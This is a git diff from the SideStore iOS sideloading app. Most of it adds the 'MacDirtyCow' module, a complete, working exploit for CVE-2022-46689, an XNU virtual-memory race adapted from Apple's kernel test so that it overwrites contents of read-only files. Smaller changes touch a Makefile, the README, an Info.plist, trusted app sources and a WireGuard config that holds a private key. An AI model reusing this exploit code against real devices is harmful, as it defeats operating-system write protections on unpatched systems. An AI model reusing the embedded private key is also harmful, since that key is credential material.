+#ifndef vm_unaligned_copy_switch_race_h
+#define vm_unaligned_copy_switch_race_h
+
+#include <stdlib.h>
+#include <stdbool.h>
+/// Uses CVE-2022-46689 to overwrite `overwrite_length` bytes of `file_to_overwrite` with `overwrite_data`, starting from `file_offset`.
+/// `file_to_overwrite` should be a file descriptor opened with O_RDONLY.
+/// `overwrite_length` must be less than or equal to `PAGE_SIZE`.
+/// Returns `true` if the overwrite succeeded, and `false` if the device is not vulnerable.
+bool unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length);
+
+#endif /* vm_unaligned_copy_switch_race_h */

MacDirtyCow/vm_unaligned_copy_switch_race.m

@@ -0,0 +1,370 @@
+//
+//  vm_unaligned_copy_switch_race.m
+//  MacDirtyCow
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+// from https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c
+// modified to compile outside of XNU
+
+#include <pthread.h>
+#include <dispatch/dispatch.h>
+#include <stdio.h>
+
+#include <mach/mach_init.h>
+#include <mach/mach_port.h>
+#include <mach/vm_map.h>
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#include "vm_unaligned_copy_switch_race.h"
+
+#define T_QUIET
+#define T_EXPECT_MACH_SUCCESS(a, b)
+#define T_EXPECT_MACH_ERROR(a, b, c)
+#define T_ASSERT_MACH_SUCCESS(a, b, ...)
+#define T_ASSERT_MACH_ERROR(a, b, c)
+#define T_ASSERT_POSIX_SUCCESS(a, b)
+#define T_ASSERT_EQ(a, b, c) do{if ((a) != (b)) { fprintf(stderr, c "\n"); exit(1); }}while(0)
+#define T_ASSERT_NE(a, b, c) do{if ((a) == (b)) { fprintf(stderr, c "\n"); exit(1); }}while(0)
+#define T_ASSERT_TRUE(a, b, ...)
+#define T_LOG(a, ...) fprintf(stderr, a "\n", __VA_ARGS__)
+#define T_DECL(a, b) static void a(void)
+#define T_PASS(a, ...) fprintf(stderr, a "\n", __VA_ARGS__)
+
+struct context1 {
+    vm_size_t obj_size;
+    vm_address_t e0;
+    mach_port_t mem_entry_ro;
+    mach_port_t mem_entry_rw;
+    dispatch_semaphore_t running_sem;
+    pthread_mutex_t mtx;
+    volatile bool done;
+};
+
+static void *
+switcheroo_thread(__unused void *arg)
+{
+    kern_return_t kr;
+    struct context1 *ctx;
+
+    ctx = (struct context1 *)arg;
+    /* tell main thread we're ready to run */
+    dispatch_semaphore_signal(ctx->running_sem);
+    while (!ctx->done) {
+        /* wait for main thread to be done setting things up */
+        pthread_mutex_lock(&ctx->mtx);
+        if (ctx->done) {
+      pthread_mutex_unlock(&ctx->mtx);
+            break;
+        }
+        /* switch e0 to RW mapping */
+        kr = vm_map(mach_task_self(),
+            &ctx->e0,
+            ctx->obj_size,
+            0,         /* mask */
+            VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
+            ctx->mem_entry_rw,
+            0,
+            FALSE,         /* copy */
+            VM_PROT_READ | VM_PROT_WRITE,
+            VM_PROT_READ | VM_PROT_WRITE,
+            VM_INHERIT_DEFAULT);
+        T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() RW");
+        /* wait a little bit */
+        usleep(100);
+        /* switch bakc to original RO mapping */
+        kr = vm_map(mach_task_self(),
+            &ctx->e0,
+            ctx->obj_size,
+            0,         /* mask */
+            VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
+            ctx->mem_entry_ro,
+            0,
+            FALSE,         /* copy */
+            VM_PROT_READ,
+            VM_PROT_READ,
+            VM_INHERIT_DEFAULT);
+        T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() RO");
+        /* tell main thread we're don switching mappings */
+        pthread_mutex_unlock(&ctx->mtx);
+        usleep(100);
+    }
+    return NULL;
+}
+
+bool unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length) {
+    bool retval = false;
+    pthread_t th = NULL;
+    int ret;
+    kern_return_t kr;
+    time_t start, duration;
+#if 0
+    mach_msg_type_number_t cow_read_size;
+#endif
+    vm_size_t copied_size;
+    int loops;
+    vm_address_t e2, e5;
+    struct context1 context1, *ctx;
+    int kern_success = 0, kern_protection_failure = 0, kern_other = 0;
+    vm_address_t ro_addr, tmp_addr;
+    memory_object_size_t mo_size;
+
+    ctx = &context1;
+    ctx->obj_size = 256 * 1024;
+
+    void* file_mapped = mmap(NULL, ctx->obj_size, PROT_READ, MAP_SHARED, file_to_overwrite, file_offset);
+    if (file_mapped == MAP_FAILED) {
+        fprintf(stderr, "failed to map\n");
+        return false;
+    }
+    if (!memcmp(file_mapped, overwrite_data, overwrite_length)) {
+        fprintf(stderr, "already the same?\n");
+        munmap(file_mapped, ctx->obj_size);
+        return true;
+    }
+    ro_addr = (vm_address_t)file_mapped;
+
+    ctx->e0 = 0;
+    ctx->running_sem = dispatch_semaphore_create(0);
+    T_QUIET; T_ASSERT_NE(ctx->running_sem, NULL, "dispatch_semaphore_create");
+    ret = pthread_mutex_init(&ctx->mtx, NULL);
+    T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_mutex_init");
+    ctx->done = false;
+    ctx->mem_entry_rw = MACH_PORT_NULL;
+    ctx->mem_entry_ro = MACH_PORT_NULL;
+#if 0
+    /* allocate our attack target memory */
+    kr = vm_allocate(mach_task_self(),
+        &ro_addr,
+        ctx->obj_size,
+        VM_FLAGS_ANYWHERE);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate ro_addr");
+    /* initialize to 'A' */
+    memset((char *)ro_addr, 'A', ctx->obj_size);
+#endif
+
+    /* make it read-only */
+    kr = vm_protect(mach_task_self(),
+        ro_addr,
+        ctx->obj_size,
+        TRUE,             /* set_maximum */
+        VM_PROT_READ);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_protect ro_addr");
+    /* make sure we can't get read-write handle on that target memory */
+    mo_size = ctx->obj_size;
+    kr = mach_make_memory_entry_64(mach_task_self(),
+        &mo_size,
+        ro_addr,
+        MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE,
+        &ctx->mem_entry_ro,
+        MACH_PORT_NULL);
+    T_QUIET; T_ASSERT_MACH_ERROR(kr, KERN_PROTECTION_FAILURE, "make_mem_entry() RO");
+    /* take read-only handle on that target memory */
+    mo_size = ctx->obj_size;
+    kr = mach_make_memory_entry_64(mach_task_self(),
+        &mo_size,
+        ro_addr,
+        MAP_MEM_VM_SHARE | VM_PROT_READ,
+        &ctx->mem_entry_ro,
+        MACH_PORT_NULL);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "make_mem_entry() RO");
+    T_QUIET; T_ASSERT_EQ(mo_size, (memory_object_size_t)ctx->obj_size, "wrong mem_entry size");
+    /* make sure we can't map target memory as writable */
+    tmp_addr = 0;
+    kr = vm_map(mach_task_self(),
+        &tmp_addr,
+        ctx->obj_size,
+        0,         /* mask */
+        VM_FLAGS_ANYWHERE,
+        ctx->mem_entry_ro,
+        0,
+        FALSE,         /* copy */
+        VM_PROT_READ,
+        VM_PROT_READ | VM_PROT_WRITE,
+        VM_INHERIT_DEFAULT);
+    T_QUIET; T_EXPECT_MACH_ERROR(kr, KERN_INVALID_RIGHT, " vm_map() mem_entry_rw");
+    tmp_addr = 0;
+    kr = vm_map(mach_task_self(),
+        &tmp_addr,
+        ctx->obj_size,
+        0,         /* mask */
+        VM_FLAGS_ANYWHERE,
+        ctx->mem_entry_ro,
+        0,
+        FALSE,         /* copy */
+        VM_PROT_READ | VM_PROT_WRITE,
+        VM_PROT_READ | VM_PROT_WRITE,
+        VM_INHERIT_DEFAULT);
+    T_QUIET; T_EXPECT_MACH_ERROR(kr, KERN_INVALID_RIGHT, " vm_map() mem_entry_rw");
+
+    /* allocate a source buffer for the unaligned copy */
+    kr = vm_allocate(mach_task_self(),
+        &e5,
+        ctx->obj_size * 2,
+        VM_FLAGS_ANYWHERE);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate e5");
+    /* initialize to 'C' */
+    memset((char *)e5, 'C', ctx->obj_size * 2);
+
+    char* e5_overwrite_ptr = (char*)(e5 + ctx->obj_size - 1);
+    memcpy(e5_overwrite_ptr, overwrite_data, overwrite_length);
+
+    int overwrite_first_diff_offset = -1;
+    char overwrite_first_diff_value = 0;
+    for (int off = 0; off < overwrite_length; off++) {
+        if (((char*)ro_addr)[off] != e5_overwrite_ptr[off]) {
+            overwrite_first_diff_offset = off;
+            overwrite_first_diff_value = ((char*)ro_addr)[off];
+        }
+    }
+    if (overwrite_first_diff_offset == -1) {
+        fprintf(stderr, "no diff?\n");
+        return false;
+    }
+
+    /*
+     * get a handle on some writable memory that will be temporarily
+     * switched with the read-only mapping of our target memory to try
+     * and trick copy_unaligned to write to our read-only target.
+     */
+    tmp_addr = 0;
+    kr = vm_allocate(mach_task_self(),
+        &tmp_addr,
+        ctx->obj_size,
+        VM_FLAGS_ANYWHERE);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate() some rw memory");
+    /* initialize to 'D' */
+    memset((char *)tmp_addr, 'D', ctx->obj_size);
+    /* get a memory entry handle for that RW memory */
+    mo_size = ctx->obj_size;
+    kr = mach_make_memory_entry_64(mach_task_self(),
+        &mo_size,
+        tmp_addr,
+        MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE,
+        &ctx->mem_entry_rw,
+        MACH_PORT_NULL);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "make_mem_entry() RW");
+    T_QUIET; T_ASSERT_EQ(mo_size, (memory_object_size_t)ctx->obj_size, "wrong mem_entry size");
+    kr = vm_deallocate(mach_task_self(), tmp_addr, ctx->obj_size);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate() tmp_addr 0x%llx", (uint64_t)tmp_addr);
+    tmp_addr = 0;
+
+    pthread_mutex_lock(&ctx->mtx);
+
+    /* start racing thread */
+    ret = pthread_create(&th, NULL, switcheroo_thread, (void *)ctx);
+    T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create");
+
+    /* wait for racing thread to be ready to run */
+    dispatch_semaphore_wait(ctx->running_sem, DISPATCH_TIME_FOREVER);
+
+    duration = 10; /* 10 seconds */
+    T_LOG("Testing for %ld seconds...", duration);
+    for (start = time(NULL), loops = 0;
+        time(NULL) < start + duration;
+        loops++) {
+        /* reserve space for our 2 contiguous allocations */
+        e2 = 0;
+        kr = vm_allocate(mach_task_self(),
+            &e2,
+            2 * ctx->obj_size,
+            VM_FLAGS_ANYWHERE);
+        T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate to reserve e2+e0");
+
+        /* make 1st allocation in our reserved space */
+        kr = vm_allocate(mach_task_self(),
+            &e2,
+            ctx->obj_size,
+            VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_MAKE_TAG(240));
+        T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate e2");
+        /* initialize to 'B' */
+        memset((char *)e2, 'B', ctx->obj_size);
+
+        /* map our read-only target memory right after */
+        ctx->e0 = e2 + ctx->obj_size;
+        kr = vm_map(mach_task_self(),
+            &ctx->e0,
+            ctx->obj_size,
+            0,         /* mask */
+            VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_MAKE_TAG(241),
+            ctx->mem_entry_ro,
+            0,
+            FALSE,         /* copy */
+            VM_PROT_READ,
+            VM_PROT_READ,
+            VM_INHERIT_DEFAULT);
+        T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() mem_entry_ro");
+
+        /* let the racing thread go */
+        pthread_mutex_unlock(&ctx->mtx);
+        /* wait a little bit */
+        usleep(100);
+
+        /* trigger copy_unaligned while racing with other thread */
+        kr = vm_read_overwrite(mach_task_self(),
+            e5,
+            ctx->obj_size - 1 + overwrite_length,
+            e2 + 1,
+            &copied_size);
+        T_QUIET;
+        T_ASSERT_TRUE(kr == KERN_SUCCESS || kr == KERN_PROTECTION_FAILURE,
+            "vm_read_overwrite kr %d", kr);
+        switch (kr) {
+        case KERN_SUCCESS:
+            /* the target was RW */
+            kern_success++;
+            break;
+        case KERN_PROTECTION_FAILURE:
+            /* the target was RO */
+            kern_protection_failure++;
+            break;
+        default:
+            /* should not happen */
+            kern_other++;
+            break;
+        }
+        /* check that our read-only memory was not modified */
+#if 0
+        T_QUIET; T_ASSERT_EQ(((char *)ro_addr)[overwrite_first_diff_offset], overwrite_first_diff_value, "RO mapping was modified");
+#endif
+        bool is_still_equal = ((char *)ro_addr)[overwrite_first_diff_offset] == overwrite_first_diff_value;
+
+        /* tell racing thread to stop toggling mappings */
+        pthread_mutex_lock(&ctx->mtx);
+
+        /* clean up before next loop */
+        vm_deallocate(mach_task_self(), ctx->e0, ctx->obj_size);
+        ctx->e0 = 0;
+        vm_deallocate(mach_task_self(), e2, ctx->obj_size);
+        e2 = 0;
+        if (!is_still_equal) {
+            retval = true;
+            fprintf(stderr, "RO mapping was modified\n");
+            break;
+        }
+    }
+
+    ctx->done = true;
+    pthread_mutex_unlock(&ctx->mtx);
+    pthread_join(th, NULL);
+
+    kr = mach_port_deallocate(mach_task_self(), ctx->mem_entry_rw);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_deallocate(me_rw)");
+    kr = mach_port_deallocate(mach_task_self(), ctx->mem_entry_ro);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_deallocate(me_ro)");
+    kr = vm_deallocate(mach_task_self(), ro_addr, ctx->obj_size);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate(ro_addr)");
+    kr = vm_deallocate(mach_task_self(), e5, ctx->obj_size * 2);
+    T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate(e5)");
+
+#if 0
+    T_LOG("vm_read_overwrite: KERN_SUCCESS:%d KERN_PROTECTION_FAILURE:%d other:%d",
+        kern_success, kern_protection_failure, kern_other);
+    T_PASS("Ran %d times in %ld seconds with no failure", loops, duration);
+#endif
+    return retval;
+}

Makefile

@@ -171,6 +171,7 @@ build:
 fakesign:
 	rm -rf archive.xcarchive/Products/Applications/SideStore.app/Frameworks/AltStoreCore.framework/Frameworks/
 	ldid -SAltStore/Resources/ReleaseEntitlements.plist archive.xcarchive/Products/Applications/SideStore.app/SideStore
+	ldid -SAltWidget/Resources/ReleaseEntitlements.plist archive.xcarchive/Products/Applications/SideStore.app/PlugIns/AltWidgetExtension.appex/AltWidgetExtension
 
 ipa:
 	mkdir Payload

README.md

@@ -9,7 +9,7 @@
 
 ![Alt](https://repobeats.axiom.co/api/embed/3a329ce95955690b9a9366f8d5598626a847d96c.svg "Repobeats analytics image")
 
-SideStore is an iOS application that allows you to sideload apps onto your iOS device with just your Apple ID. SideStore resigns apps with your personal development certificate, and then uses a [specially designed VPN](https://github.com/jkcoxson/Secret-Tunnel) in order to trick iOS into installing them. SideStore will periodically "refresh" your apps in the background, to keep their normal 7-day development period from expiring.
+SideStore is an iOS application that allows you to sideload apps onto your iOS device with just your Apple ID. SideStore resigns apps with your personal development certificate, and then uses a [specially designed VPN](https://github.com/jkcoxson/em_proxy) in order to trick iOS into installing them. SideStore will periodically "refresh" your apps in the background, to keep their normal 7-day development period from expiring.
 
 SideStore's goal is to provide an untethered sideloading experience. It's a community driven fork of [AltStore](https://github.com/rileytestut/AltStore), and has already implemented some of the community's most-requested features.
 

Shared/Extensions/Bundle+AltStore.swift

@@ -56,7 +56,7 @@ public extension Bundle
 public extension Bundle
 {
     static var baseAltStoreAppGroupID = "group." + Bundle.Info.appbundleIdentifier
-    
+
     var appGroups: [String] {
         return self.infoDictionary?[Bundle.Info.appGroups] as? [String] ?? []
     }

SideStore copy-Info.plist

@@ -0,0 +1,212 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>ALTAnisetteURL</key>
+	<string>https://ani.sidestore.io</string>
+	<key>ALTAppGroups</key>
+	<array>
+		<string>group.$(APP_GROUP_IDENTIFIER)</string>
+		<string>group.com.SideStore.SideStore</string>
+	</array>
+	<key>ALTDeviceID</key>
+	<string>00008101-000129D63698001E</string>
+	<key>ALTPairingFile</key>
+	<string>&lt;insert pairing file here&gt;</string>
+	<key>ALTServerID</key>
+	<string>1F7D5B55-79CE-4546-A029-D4DDC4AF3B6D</string>
+	<key>CFBundleDevelopmentRegion</key>
+	<string>$(DEVELOPMENT_LANGUAGE)</string>
+	<key>CFBundleDocumentTypes</key>
+	<array>
+		<dict>
+			<key>CFBundleTypeIconFiles</key>
+			<array/>
+			<key>CFBundleTypeName</key>
+			<string>iOS App</string>
+			<key>CFBundleTypeRole</key>
+			<string>Viewer</string>
+			<key>LSHandlerRank</key>
+			<string>Alternate</string>
+			<key>LSItemContentTypes</key>
+			<array>
+				<string>com.apple.itunes.ipa</string>
+			</array>
+		</dict>
+	</array>
+	<key>CFBundleExecutable</key>
+	<string>$(EXECUTABLE_NAME)</string>
+	<key>CFBundleIdentifier</key>
+	<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
+	<key>CFBundleInfoDictionaryVersion</key>
+	<string>6.0</string>
+	<key>CFBundleName</key>
+	<string>$(PRODUCT_NAME)</string>
+	<key>CFBundlePackageType</key>
+	<string>APPL</string>
+	<key>CFBundleShortVersionString</key>
+	<string>$(MARKETING_VERSION)</string>
+	<key>CFBundleURLTypes</key>
+	<array>
+		<dict>
+			<key>CFBundleTypeRole</key>
+			<string>Editor</string>
+			<key>CFBundleURLName</key>
+			<string>AltStore General</string>
+			<key>CFBundleURLSchemes</key>
+			<array>
+				<string>altstore</string>
+				<string>sidestore</string>
+			</array>
+		</dict>
+		<dict>
+			<key>CFBundleTypeRole</key>
+			<string>Editor</string>
+			<key>CFBundleURLName</key>
+			<string>AltStore Backup</string>
+			<key>CFBundleURLSchemes</key>
+			<array>
+				<string>altstore-com.rileytestut.AltStore</string>
+				<string>sidestore-com.SideStore.SideStore</string>
+			</array>
+		</dict>
+	</array>
+	<key>CFBundleVersion</key>
+	<string>1</string>
+	<key>INIntentsSupported</key>
+	<array>
+		<string>RefreshAllIntent</string>
+		<string>ViewAppIntent</string>
+	</array>
+	<key>LSApplicationQueriesSchemes</key>
+	<array>
+		<string>altstore-com.rileytestut.AltStore</string>
+		<string>altstore-com.rileytestut.AltStore.Beta</string>
+		<string>altstore-com.rileytestut.Delta</string>
+		<string>altstore-com.rileytestut.Delta.Beta</string>
+		<string>altstore-com.rileytestut.Delta.Lite</string>
+		<string>altstore-com.rileytestut.Delta.Lite.Beta</string>
+		<string>altstore-com.rileytestut.Clip</string>
+		<string>altstore-com.rileytestut.Clip.Beta</string>
+	</array>
+	<key>LSRequiresIPhoneOS</key>
+	<true/>
+	<key>LSSupportsOpeningDocumentsInPlace</key>
+	<true/>
+	<key>NSAppTransportSecurity</key>
+	<dict>
+		<key>NSAllowsArbitraryLoads</key>
+		<true/>
+	</dict>
+	<key>NSAppleMusicUsageDescription</key>
+	<string>SideStore needs this for MacDirtyCow</string>
+	<key>NSBonjourServices</key>
+	<array>
+		<string>_altserver._tcp</string>
+	</array>
+	<key>NSLocalNetworkUsageDescription</key>
+	<string>SideStore uses the local network to find and communicate with your device.</string>
+	<key>NSUserActivityTypes</key>
+	<array>
+		<string>RefreshAllIntent</string>
+		<string>ViewAppIntent</string>
+	</array>
+	<key>UIApplicationSceneManifest</key>
+	<dict>
+		<key>UIApplicationSupportsMultipleScenes</key>
+		<true/>
+		<key>UISceneConfigurations</key>
+		<dict>
+			<key>UIWindowSceneSessionRoleApplication</key>
+			<array>
+				<dict>
+					<key>UILaunchStoryboardName</key>
+					<string>LaunchScreen</string>
+					<key>UISceneConfigurationName</key>
+					<string>Default Configuration</string>
+					<key>UISceneDelegateClassName</key>
+					<string>$(PRODUCT_MODULE_NAME).SceneDelegate</string>
+					<key>UISceneStoryboardFile</key>
+					<string>Main</string>
+				</dict>
+			</array>
+		</dict>
+	</dict>
+	<key>UIBackgroundModes</key>
+	<array>
+		<string>audio</string>
+		<string>fetch</string>
+		<string>remote-notification</string>
+	</array>
+	<key>UIFileSharingEnabled</key>
+	<true/>
+	<key>UILaunchStoryboardName</key>
+	<string>LaunchScreen</string>
+	<key>UIMainStoryboardFile</key>
+	<string>Main</string>
+	<key>UIRequiredDeviceCapabilities</key>
+	<array>
+		<string>armv7</string>
+	</array>
+	<key>UIStatusBarTintParameters</key>
+	<dict>
+		<key>UINavigationBar</key>
+		<dict>
+			<key>Style</key>
+			<string>UIBarStyleDefault</string>
+			<key>Translucent</key>
+			<false/>
+		</dict>
+	</dict>
+	<key>UISupportedInterfaceOrientations</key>
+	<array>
+		<string>UIInterfaceOrientationPortrait</string>
+	</array>
+	<key>UISupportedInterfaceOrientations~ipad</key>
+	<array>
+		<string>UIInterfaceOrientationPortrait</string>
+		<string>UIInterfaceOrientationPortraitUpsideDown</string>
+		<string>UIInterfaceOrientationLandscapeLeft</string>
+		<string>UIInterfaceOrientationLandscapeRight</string>
+	</array>
+	<key>UTImportedTypeDeclarations</key>
+	<array>
+		<dict>
+			<key>UTTypeConformsTo</key>
+			<array>
+				<string>public.data</string>
+			</array>
+			<key>UTTypeDescription</key>
+			<string>iOS App</string>
+			<key>UTTypeIconFiles</key>
+			<array/>
+			<key>UTTypeIdentifier</key>
+			<string>com.apple.itunes.ipa</string>
+			<key>UTTypeTagSpecification</key>
+			<dict>
+				<key>public.filename-extension</key>
+				<string>ipa</string>
+			</dict>
+		</dict>
+		<dict>
+			<key>UTTypeConformsTo</key>
+			<array>
+				<string>com.apple.plist</string>
+			</array>
+			<key>UTTypeDescription</key>
+			<string>Mobile Device Pairing</string>
+			<key>UTTypeIconFiles</key>
+			<array/>
+			<key>UTTypeIdentifier</key>
+			<string>org.sidestore.mobiledevicepairing</string>
+			<key>UTTypeTagSpecification</key>
+			<dict>
+				<key>public.filename-extension</key>
+				<array>
+					<string>mobiledevicepairing</string>
+				</array>
+			</dict>
+		</dict>
+	</array>
+</dict>
+</plist>

SideStore.conf

@@ -0,0 +1,9 @@
+[Interface]
+PrivateKey = AIIeeUDvk3NeAFJ9BWCQvPJize/9WZibMnGJ/0rt5k4=
+Address = 10.7.0.10/24
+
+[Peer]
+PublicKey = kHDoekeYhBvfW9a9UQ+UCmpbG423eejTjcjW+DT+JF0=
+AllowedIPs = 10.7.0.1/32
+Endpoint = 127.0.0.1:51820
+PersistentKeepalive = 25

trustedapps.json

@@ -32,9 +32,17 @@
       "identifier": "eu.pokemmo.altstore",
       "sourceURL": "https://pokemmo.eu/altstore/"
     },
+    {
+      "identifier": "dev.theodyssey.sidestore",
+      "sourceURL": "https://theodyssey.dev/altstore/odysseysource.json"
+    },
     {
       "identifier": "stream.yattee",
       "sourceURL": "https://repos.yattee.stream/alt/apps.json"
+    },
+    {
+      "identifier": "com.litritt.litsource",
+      "sourceURL": "https://altstore.ignitedemulator.com/"
     }
   ]
 }